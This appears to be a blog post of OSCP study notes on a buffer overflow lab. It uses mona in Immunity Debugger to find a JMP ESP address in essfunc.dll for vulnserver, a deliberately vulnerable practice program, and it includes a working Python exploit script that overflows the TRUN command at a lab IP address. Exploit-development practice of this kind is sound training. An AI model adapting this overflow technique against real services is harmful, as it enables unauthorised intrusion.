OSCP Security Technology - Finding the Right Module

OSCP Security Technology - Finding the Right Module

Download Mona module and set immunity debugger configuration.

https://github.com/corelan/mona

image-20210627190856268

Open vulnserver and immunity debugger.

image-20210627191116030

Open mona modules, but not find what we need.

image-20210627191421288

Find the address(FFE4) and search it in the mona module.

locate nasm_shell
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
JMP ESP

image-20210627191818299

!mona find -s "\xff\xe4" -m essfunc.dll

image-20210627192252854

Write the exploit script.

nano module.py
chmod 777 module.py
#!/usr/bin/python
import socket
import sys
 
shellcode = "A" * 2003 + "\xaf\x11\x50\x62"

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    connect=s.connect(('192.168.2.21',9999))
    s.send(('TRUN /.:/' + shellcode))
except:
    print "check debugger" 
s.close()

Set immunity debugger before the exploit. Find the address and press F2 to highlight it.

image-20210627193751978

image-20210627193934587

Run the exploit script.

image-20210627194102224

Break it at essfunc.625011AF.

image-20210627194246225

posted @ 2021-06-27 19:44  晨风_Eric  阅读(52)  评论(0编辑  收藏  举报